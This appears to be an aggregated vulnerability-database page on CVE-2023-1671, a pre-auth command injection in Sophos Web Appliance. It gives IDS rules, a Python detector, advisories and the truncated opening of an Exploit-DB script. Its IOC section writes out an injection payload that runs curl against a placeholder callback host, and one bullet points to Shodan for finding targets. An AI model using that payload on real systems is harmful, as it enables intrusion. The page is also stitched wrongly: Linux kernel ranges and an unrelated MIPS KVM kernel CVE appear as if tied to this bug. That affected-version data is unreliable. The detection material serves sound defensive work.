CVE-2023-1671
Published 2023-04-04
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
Priority P1 · 97 · critical 9.8 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability · due 2023-12-07
Exploited in the wild
EPSS 100.00% (100.0th percentile)
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | >= 5.13.0 < 5.15.121 | 5.15.121 |
| linux | linux_kernel | >= 5.16.0 < 6.1.40 | 6.1.40 |
| linux | linux_kernel | >= 6.2.0 < 6.4.5 | 6.4.5 |
| sophos | sophos_web_appliance | >= unspecified < 4.3.10.4 | 4.3.10.4 |
| sophos | web_appliance | < 4.3.10.4 | 4.3.10.4 |
Detection & IOCs
command: args_reason=filetypewarn&url=<rand>&filetype=<rand>&user=<rand>&user_encoded=<base64("';curl http://<oast-url> #")>
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue"; http.request_body; content:"args_reason=filetypewarn&url="; startswith; fast_pattern; content:"&filetype="; content:"&user_encoded="; reference:url,sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; classtype:attempted-admin; sid:2049632; rev:2; metadata:attack_target Client_Endpoint, created_at 2023_12_11, cve CVE_2023_1671, deployment Perimeter, deployment SSLDecrypt, confidence High, signature_severity Major, tag cve_2023_1671, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_27, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
bytes
|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue
- Look for HTTP POST requests to /index.php with query parameters c=blocked&action=continue — this is the vulnerable warn-proceed handler endpoint.
- Inspect the POST body for the pattern args_reason=filetypewarn combined with a user_encoded parameter containing base64-encoded shell metacharacters (e.g., single quote, semicolon, shell commands).
- Detect out-of-band callback activity (DNS/HTTP) from the Sophos Web Appliance host, which would indicate successful command injection via the user_encoded parameter.
- Use Shodan/FOFA to identify exposed Sophos Web Appliance instances via title or favicon hash as potential targets.
- The exploit is pre-authentication — no session cookie or login is required. Any POST to the vulnerable endpoint from an unauthenticated source should be treated as suspicious.
- ET Snort SID 2049632 (rev:2) covers this exploit attempt; ensure IDS/IPS rules are updated to at least this revision.
- The Snort/ET rule requires SSL decryption to be effective, as the appliance is typically accessed over HTTPS.
- Sophos Web Appliance reached end-of-life on July 20, 2023 and no longer receives updates; patching to 4.3.10.4 was delivered as an automatic patch on April 4, 2023, but only applies to instances that did not disable auto-patch.
- The URI bsize match in the Snort rule is exactly 36 bytes; ensure the rule engine supports the bsize keyword correctly to avoid false negatives.
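The checks listed above, as one request-inspection routine (an added example for this page, not code from Emerging Threats, Sophos or any of the sources listed): it applies the same URI, body-prefix and parameter conditions as SID 2049632 and then base64-decodes `user_encoded` to look for shell metacharacters, the step a byte-matching rule cannot perform through the encoding layer. The sample requests, the `swa.example.invalid` host and the usernames are constructed.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote

# The 36-byte URI the Emerging Threats rule (sid:2049632) pins with bsize:36.
VULN_URI = "/index.php?c=blocked&action=continue"
BODY_PREFIX = "args_reason=filetypewarn&url="
# Characters an ordinary username never needs but which terminate or chain shell commands.
SHELL_META = re.compile(r"[;'\"`|&$()<>\n]")


def parse_request(raw: str) -> tuple:
    """Split a raw HTTP request into (method, uri, body); headers are irrelevant here."""
    head, _, body = raw.partition("\r\n\r\n")
    method, uri = head.split("\r\n", 1)[0].split(" ")[:2]
    return method, uri, body


def inspect_warn_proceed(raw: str) -> dict:
    """Apply the rule's match conditions, then decode user_encoded to grade the hit.

    rule_match: request would trip sid:2049632 (POST to the handler, filetypewarn body,
    filetype and user_encoded present). shell_meta: decoded user_encoded holds shell
    metacharacters, which the byte-matching rule cannot see through the base64 layer.
    """
    method, uri, body = parse_request(raw)
    verdict = {"rule_match": False, "shell_meta": False, "decoded_user": None}
    if method != "POST" or uri != VULN_URI or not body.startswith(BODY_PREFIX):
        return verdict
    params = parse_qs(body, keep_blank_values=True)
    if "filetype" not in params or "user_encoded" not in params:
        return verdict
    verdict["rule_match"] = True
    try:
        decoded = base64.b64decode(params["user_encoded"][0], validate=True)
    except (binascii.Error, ValueError):
        return verdict  # undecodable value: still a rule hit, nothing further to grade
    verdict["decoded_user"] = decoded.decode("utf-8", errors="replace")
    verdict["shell_meta"] = SHELL_META.search(verdict["decoded_user"]) is not None
    return verdict


def build_request(username: str) -> str:
    """Constructed sample traffic (not a capture): a POST to the handler carrying `username`."""
    enc = quote(base64.b64encode(username.encode()).decode(), safe="")
    body = f"{BODY_PREFIX}http%3A%2F%2Fexample.invalid%2Fa.exe&filetype=exe&user=jdoe&user_encoded={enc}"
    return (f"POST {VULN_URI} HTTP/1.1\r\nHost: swa.example.invalid\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + body)
```

A request with an ordinary username still satisfies every rule condition, which is why the decoded value, not the byte pattern, is what separates an attempt from a plain hit on the endpoint.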
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
OSV
MIPS: KVM: Fix NULL pointer dereference
osv · 2025-12-30 · CVE-2023-54241
In the Linux kernel, the following vulnerability has been resolved:
MIPS: KVM: Fix NULL pointer dereference
After commit 45c7e8af4a5e3f0bea4ac209 ("MIPS: Remove KVM_TE support") we get a NULL pointer dereference when creating a KVM guest:
[ 146.243409] Starting KVM with MIPS VZ extensions
[ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c
[ 149.849177] Oops[#1]:
[ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671
[ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020
[ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffffffff8119c740
[ 149.8492
GHSA
GHSA-5f37-m2hf-qphr · ghsa_unreviewed · 2023-04-04 · CVE-2023-1671 · CRITICAL · CWE-77
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
VulnCheck
Sophos Web Appliance Command Injection Vulnerability
vulncheck · 2023 · CVSS 9.8 · CVE-2023-1671 · CRITICAL · CWE-77
Sophos Web Appliance contains a command injection vulnerability in the warn-proceed handler that allows for remote code execution.
Affected: Sophos Web Appliance
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-29&host_type=src&vulnerability=cve-2023-1671; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-1671; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023
CISA
Sophos Web Appliance Command Injection Vulnerability
cisa · 2023-11-16 · CVSS 9.8 · CVE-2023-1671 · CRITICAL · CWE-77
Vulnerability: Sophos Web Appliance Command Injection Vulnerability
Affected: Sophos Web Appliance
Sophos Web Appliance contains a command injection vulnerability in the warn-proceed handler that allows for remote code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; https://nvd.nist.gov/vuln/detail/CVE-2023-1671
Remediation Due Date: 2023-12-07
Suricata
ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)
suricata · 2023-12-11 · CVSS 9.8 · CVE-2023-1671 · CRITICAL
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue"; http.request_body; content:"args_reason=filetypewarn&url="; startswith; fast_pattern; content:"&filetype="; content:"&user_encoded="; reference:url,sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; classtype:attempted-admin; sid:2049632; rev:2; metadata:attack_target Client_Endpoint, created_at 2023_12_11, cve CVE_2023_1671, deployment Perimeter, deployment SSLDecrypt, confidence High, signature_severity Major,
Exploit-DB
Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
exploitdb · 2023-04-25 · CVSS 9.8 · CVE-2023-1671 · CRITICAL
---
#!/bin/bash
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version: Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis
TARGET_LIST="$1"
# =====================
BOLD="\033[1m"
RED="\e[1;31m"
GREEN="\e[1;32m"
YELLOW="\e[1;33m"
BLUE="\e[1;34m"
NOR="\e[0m"
# ====================
get_new_subdomain()
{
cat MN.txt | grep 'YES' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo -e " [+] Trying
Nuclei
Sophos Web Appliance - Remote Code Execution
nuclei · CVSS 9.8 · CVE-2023-1671 · CRITICAL
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
Template:
id: CVE-2023-1671
info:
  name: Sophos Web Appliance - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.
  reference:
    - https://vulncheck.com/blog/cve-2023-1671-anal
Bleepingcomputer
CISA warns of actively exploited Windows, Sophos, and Oracle bugs
blogs_bleepingcomputer · 2023-11-17 · CVSS 9.8 · CRITICAL
By Bill Toulas
The U.S. Cybersecurity & Infrastructure Security Agency has added to its catalog of known exploited vulnerabilities (KEV) three security issues that affect Microsoft devices, a Sophos product, and an enterprise solution from Oracle.
The KEV catalog contains flaws confirmed to be exploited by hackers in attacks and serves as a repository for vulnerabilities that companies all over should treat with priority.
The agency is urging federal agencies to apply available security updates for the three issues before December 7. The three vulnerabilities are tracked as follows:
- CVE-2023-36584 – "Mark of the Web" (MotW) security feature bypass on Microsoft Windows.
- CVE-2023-1671 – Command injection vulnerability
Bugzilla
CVE-2023-54241 kernel: MIPS: KVM: Fix NULL pointer dereference
bugzilla · 2025-12-30 · CVE-2023-54241
In the Linux kernel, the following vulnerability has been resolved:
MIPS: KVM: Fix NULL pointer dereference
After commit 45c7e8af4a5e3f0bea4ac209 ("MIPS: Remove KVM_TE support") we get a NULL pointer dereference when creating a KVM guest:
[ 146.243409] Starting KVM with MIPS VZ extensions
[ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c
[ 149.849177] Oops[#1]:
[ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671
[ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020
[ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffff
References
http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html
https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-1671
Published: 2023-04-04
Added to CISA KEV: 2023-11-16
Exploited in the wild